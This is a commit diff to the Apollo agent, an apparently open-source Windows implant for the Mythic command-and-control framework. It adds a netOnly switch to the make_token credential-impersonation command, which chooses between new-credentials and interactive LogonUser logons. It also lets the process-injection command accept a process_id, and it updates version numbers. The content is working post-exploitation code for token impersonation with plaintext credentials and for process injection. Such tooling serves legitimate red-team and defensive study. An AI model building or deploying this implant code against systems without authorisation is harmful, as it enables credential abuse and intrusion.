updating make_token to allow interactive or netonly logons

Author: its-a-feature

Payload_Type/apollo/apollo/agent_code/Apollo/Management/Identity/IdentityManager.cs

@@ -304,7 +304,7 @@ public bool SetIdentity(ApolloLogonInformation logonInfo)
             _userCredential.Username,
             _userCredential.Domain,
             _userCredential.Password,
-            LogonType.LOGON32_LOGON_NEW_CREDENTIALS,
+            _userCredential.NetOnly ? LogonType.LOGON32_LOGON_NEW_CREDENTIALS : LogonType.LOGON32_LOGON_INTERACTIVE,
             LogonProvider.LOGON32_PROVIDER_WINNT50,
             out hToken);
 

Payload_Type/apollo/apollo/agent_code/Tasks/make_token.cs

@@ -22,6 +22,8 @@ internal struct MakeTokenParameters
         {
             [DataMember(Name = "credential")]
             public Credential Credential;
+            [DataMember(Name = "netOnly")]
+            public bool NetOnly;
         }
         public make_token(IAgent agent, ApolloInterop.Structs.MythicStructs.MythicTask data) : base(agent, data)
         {
@@ -47,15 +49,26 @@ public override void Start()
                 ApolloLogonInformation info = new ApolloLogonInformation(
                     parameters.Credential.Account,
                     parameters.Credential.CredentialMaterial,
-                    parameters.Credential.Realm);
+                    parameters.Credential.Realm,
+                    parameters.NetOnly);
                 if (_agent.GetIdentityManager().SetIdentity(info))
                 {
                     var cur = _agent.GetIdentityManager().GetCurrentImpersonationIdentity();
-                    resp = CreateTaskResponse(
-                        $"Successfully impersonated {cur.Name}",
+                    if (parameters.NetOnly)
+                    {
+                        resp = CreateTaskResponse(
+                        $"Successfully impersonated {cur.Name} for local access and {parameters.Credential.Realm}\\{parameters.Credential.Account} for remote access",
+                        true,
+                        "completed",
+                        new IMythicMessage[] { Artifact.PlaintextLogon(cur.Name, true) });
+                    } else
+                    {
+                        resp = CreateTaskResponse(
+                        $"Successfully impersonated {cur.Name} for local and remote access",
                         true,
                         "completed",
-                        new IMythicMessage[] {Artifact.PlaintextLogon(cur.Name, true)});
+                        new IMythicMessage[] { Artifact.PlaintextLogon(cur.Name, true) });
+                    }
                 }
                 else
                 {

Payload_Type/apollo/apollo/mythic/agent_functions/builder.py

@@ -16,12 +16,12 @@
 class Apollo(PayloadType):
     name = "apollo"
     file_extension = "exe"
-    author = "@djhohnstein"
+    author = "@djhohnstein, @its_a_feature_"
     mythic_encrypts = True
     supported_os = [
         SupportedOS.Windows
     ]
-    version = "2.2.21"
+    version = "2.2.22"
     wrapper = False
     wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
     note = """

Payload_Type/apollo/apollo/mythic/agent_functions/inject.py

@@ -64,6 +64,9 @@ async def parse_arguments(self):
         if self.command_line[0] != "{":
             raise Exception("Inject requires JSON parameters and not raw command line.")
         self.load_args_from_json_string(self.command_line)
+        supplied_dict = json.loads(self.command_line)
+        if "process_id" in supplied_dict:
+            self.add_arg("pid", int(supplied_dict["process_id"]))
         if self.get_arg("pid") == 0:
             raise Exception("Required non-zero PID")
 
@@ -87,6 +90,7 @@ class InjectCommand(CommandBase):
     argument_class = InjectArguments
     attackmapping = ["T1055"]
     completion_functions = {"inject_callback": inject_callback}
+    supported_ui_features = ["process_browser:inject"]
 
     async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
         response = PTTaskCreateTaskingMessageResponse(

Payload_Type/apollo/apollo/mythic/agent_functions/make_token.py

@@ -38,6 +38,25 @@ def __init__(self, command_line, **kwargs):
                     required=True,
                     ui_position=2
                 )]
+            ),
+            CommandParameter(
+                name="netOnly",
+                cli_name="netOnly",
+                display_name="NetOnly Logon",
+                description="NetOnly logons use the LOGON32_LOGON_NEW_CREDENTIALS API, otherwise LOGON32_LOGON_INTERACTIVE is used. NetOnly logons do not use make_token credentials locally, only remotely. Using Interactive logons means that the credentials are used locally as well.",
+                default_value=True,
+                type=ParameterType.Boolean,
+                parameter_group_info=[
+                    ParameterGroupInfo(
+                        group_name="credential_store",
+                        required=False,
+                        ui_position=2
+                    ),
+                    ParameterGroupInfo(
+                        ui_position=3,
+                        required=False,
+                    )
+                ]
             )
         ]
 
@@ -70,15 +89,16 @@ async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreat
             taskData.args.remove_arg("password")
             usernamePieces = username.split("\\")
             if len(usernamePieces) != 2:
-                raise Exception("username not in domain\\user format")
+                usernamePieces = [taskData.Callback.Host, usernamePieces[0]]
             cred = {
                 "type": "plaintext",
                 "realm": usernamePieces[0],
                 "credential": password,
                 "account": usernamePieces[1]
             }
             taskData.args.add_arg("credential", cred, type=ParameterType.Credential_JSON)
-            response.DisplayParams = "{}\\{} {}".format(cred.get("realm"), cred.get("account"), cred.get("credential"))
+            response.DisplayParams = "{}\\{} {} ({})".format(cred.get("realm"), cred.get("account"), cred.get("credential"),
+                                                             "netOnly" if taskData.args.get_arg("netOnly") else "interactive")
         return response
 
     async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:

agent_capabilities.json

@@ -10,7 +10,7 @@
   "payload_output": ["exe", "shellcode", "service"],
   "architectures": ["x86_64"],
   "c2": ["http", "smb", "tcp", "websocket"],
-  "mythic_version": "3.3.1-rc28",
-  "agent_version": "2.2.21",
+  "mythic_version": "3.3.1-rc35",
+  "agent_version": "2.2.22",
   "supported_wrappers": ["service_wrapper", "scarecrow_wrapper"]
 }